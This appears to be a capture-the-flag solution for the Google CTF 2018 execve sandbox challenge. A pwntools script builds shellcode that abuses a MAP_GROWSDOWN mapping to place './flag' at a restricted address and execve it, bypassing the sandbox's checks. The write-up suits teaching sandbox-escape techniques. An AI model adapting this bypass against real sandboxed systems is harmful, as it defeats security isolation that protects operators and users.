See writeup at [https://devcraft.io/2018/06/26/execve-sandbox-google-ctf-2018.html](https://devcraft.io/2018/06/26/execve-sandbox-google-ctf-2018.html)

* mmap at 0x11000 with `MAP_GROWSDOWN`
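* make the kernel map another page below it: set `rsp` to 0x11000 and push, so the write faults just under the mapping and it grows down to 0x10000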
* write `./flag` to 0x10000 and `execve`

```python
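from pwn import *

context.arch = "amd64"  # shellcraft/asm must target x86-64 (the code uses rsp)

def exploit(p):
    # p: pwntools tube already connected to the challenge service
    code = ""
    # Map one page at 0x11000 that is allowed to grow downward.
    code += shellcraft.syscall('SYS_mmap', 0x11000, 0x1000,
        constants.PROT_READ | constants.PROT_WRITE | constants.PROT_EXEC,
        constants.MAP_GROWSDOWN | constants.MAP_ANONYMOUS | constants.MAP_PRIVATE,
        0, 0
    )
    # Pushing from the bottom of the mapping faults below it,
    # so the kernel extends the mapping to cover the page at 0x10000.
    code += "mov rsp, 0x11000\n"
    code += shellcraft.pushstr("./flag")
    # Copy the 6-byte path to 0x10000 and execve it.
    code += shellcraft.memcpy(0x10000, 'rsp', 6)
    code += shellcraft.syscall('SYS_execve', 0x10000, 0, 0)
    code += shellcraft.exit(0)

    elf = make_elf(asm(code), extract=True, strip=True)

    # The service reads a fixed-size binary; pad to 0x1000 bytes.
    payload = elf.ljust(0x1000, b"\x00")
    p.sendafter(b"binary...", payload)
    print(p.recvall())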
```
